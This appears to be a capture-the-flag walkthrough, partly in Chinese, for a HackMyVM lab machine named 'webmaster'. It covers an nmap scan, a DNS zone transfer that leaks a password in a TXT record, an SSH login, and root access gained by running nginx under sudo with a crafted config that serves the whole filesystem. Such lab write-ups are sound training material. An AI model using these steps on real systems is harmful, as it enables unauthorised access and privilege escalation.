Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -p0-65535 --min-rate 5000 192.168.205.240
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-19 21:00 -0400
Nmap scan report for 192.168.205.240
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
MAC Address: 08:00:27:14:EF:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.22 seconds开放 22/53/80,重点看 DNS 和 Web。
Web
┌──(kali㉿kali)-[~]
└─$ curl -v http://192.168.205.240/
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
<img src="comic.png" alt="comic">
<!--webmaster.hmv-->HTML 注释泄露域名 webmaster.hmv。
DNS Zone Transfer
用域名做 zone transfer:
┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.205.240 webmaster.hmv
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11john.webmaster.hmv 的 TXT 记录里直接有密码:Myhiddenpazzword
SSH
用 john / Myhiddenpazzword 登录:
┌──(kali㉿kali)-[~]
└─$ sshpass -p 'Myhiddenpazzword' ssh -o StrictHostKeyChecking=no john@192.168.205.240
john@webmaster:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)读取 user flag:
john@webmaster:~$ cat user.txt
HMVdnsyo提权
sudo -l
john@webmaster:~$ sudo -l
Matching Defaults entries for john on webmaster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User john may run the following commands on webmaster:
(ALL : ALL) NOPASSWD: /usr/sbin/nginxjohn 可以无密码以 root 身份运行 nginx。
nginx 提权
参考 GTFOBins,写一个 user root; 的配置,让 nginx worker 以 root 运行,root /; autoindex on; 让整个文件系统可读:
john@webmaster:~$ cat > /tmp/nginx.conf << 'EOF'
user root;
events {}
http {
server {
listen 8080;
root /;
autoindex on;
}
}
EOF
john@webmaster:~$ sudo nginx -c /tmp/nginx.conf -p /tmp关键点:必须加 -p /tmp 指定 prefix 路径,否则 nginx 无法加载模块目录下的 .so 文件,worker 进程不会启动。
通过新启动的 nginx 读取 root 目录:
john@webmaster:~$ wget http://127.0.0.1:8080/root/ -O -
<html>
<head><title>Index of /root/</title></head>
<body bgcolor="white">
<h1>Index of /root/</h1><hr><pre><a href="../">../</a>
<a href="flag.sh">flag.sh</a> 05-Dec-2020 09:49 1920
<a href="root.txt">root.txt</a> 05-Dec-2020 09:50 13
</pre><hr></body>
</html>
john@webmaster:~$ wget http://127.0.0.1:8080/root/root.txt -O -
HMVnginxpwnd